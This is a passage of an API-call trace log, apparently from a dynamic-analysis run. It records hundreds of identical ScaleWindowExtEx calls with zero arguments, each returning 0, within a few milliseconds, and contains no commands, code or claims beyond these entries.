ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.879] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.880] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.881] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.882] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 